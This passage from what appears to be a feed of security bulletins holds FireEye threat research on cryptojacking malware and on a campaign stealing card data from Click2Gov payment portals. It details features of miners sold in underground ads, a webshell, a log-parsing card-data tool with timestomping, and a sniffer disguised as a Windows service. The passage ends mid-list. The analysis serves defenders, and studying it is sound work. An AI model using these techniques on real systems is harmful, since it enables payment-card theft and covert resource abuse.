According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. 
Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n * Windows Task Manager\n * Process Killer\n * KillProcess\n * System Explorer\n * Process Explorer\n * AnVir\n * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.\n\nThe electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. 
The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. 
Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. 
Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. 
The IcedID injects launched an anonymous miner using the mining code from Coinhive's [AuthedMine](<https://authedmine.com/lib/authedmine.min.js>).\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. 
Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. 
However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. 
This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. 
Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. 
It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. 
The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n \n--- \n \ncalifornia_540_tax_form_2013_instructions.exe\n\nstate_bank_of_india_money_transfer_agency.exe\n\nformat_transfer_sms_banking_bni_ke_bca.exe\n\nconfirmation_receipt_letter_sample.exe\n\nsbi_online_apply_2015_po.exe\n\nestimated_tax_payment_coupon_irs.exe\n\nhow_to_add_a_non_us_bank_account_to_paypal.exe\n\nwestern_union_money_transfer_from_uk_to_bangladesh.exe\n\ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe\n\nhow_to_open_a_business_bank_account_with_bad_credit_history.exe\n\napply_for_sbi_credit_card_online.exe\n\nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). 
Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. 
The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. 
According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). 
Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. 
However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking websites of known mining project websites, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. 
These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. 
Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "modified": "2018-07-18T10:00:00", "published": "2018-07-18T10:00:00", "id": "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-11T20:17:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-3506", "CVE-2017-3248", "CVE-2017-10271"], "description": "FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. [Click2Gov](<https://www.superion.com/public-administration/click2gov/>) is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement [confirming suspicious activity](<https://www.superion.com/ceo-response-to-reported-breach/>) had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. 
A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.\n\nOn June 15, 2018, Superion released a statement describing their [proactive notification to affected customers](<https://www.superion.com/click2gov-update/>), work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.\n\nMandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.\n\n#### Attack Overview\n\nThe first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. 
The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).\n\n#### SJavaWebManage Webshell\n\nIt is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle WebLogic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the [publicly available JavaServer Pages (JSP) webshell SJavaWebManage](<https://github.com/tennc/webshell/blob/master/jsp/SJavaWebManageV1.4.jsp>) to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.\n\n \nFigure 1: Sample SJavaWebManage interface\n\n * **EnvsInfo**: Displays information about the Java runtime, Tomcat version, and other information about the environment.\n * **FileManager**: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.\n * **CMDS**: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.\n * **DBManage**: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.\n\nThe differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SJavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. 
The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.\n\nThe attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.\n\n#### FIREALARM\n\nUsing interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.\n\nFIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments: Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If a log file exists, FIREALARM copies its MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to the original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:\n\n * medium.accountNumber\n * medium.cvv2\n * medium.expirationDate.year\n * medium.expirationDate.month\n * medium.firstName\n * medium.lastName\n * medium.middleInitial\n * medium.contact.address1\n * medium.contact.address2\n * medium.contact.city\n * medium.contact.state\n * medium.contact.zip.code\n\nThis data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\\temp\\THN1080.tmp. 
After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are restored to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.\n\n \nFigure 2: FIREALARM workflow\n\n 1. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage.\n 2. Attacker launches cmd prompt via webshell.\n 3. Attacker runs FIREALARM with parameters.\n 4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with original times.\n 5. THN1080.tmp is deleted.\n\n#### SPOTLIGHT\n\nLater, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.\n\nSPOTLIGHT accepts two command line arguments:\n\n * gplcsvc.exe -i Creates a new service named gplcsvc with the display name Group Policy Service\n * gplcsvc.exe -u Stops and deletes the service named gplcsvc\n\nUpon installation, SPOTLIGHT will monitor two paths on the infected host every hour:\n\n 1. C:\\bea\\c2gdomain\\applications\\Click2GovCX\\scripts\\validator.jsp\n 2. 
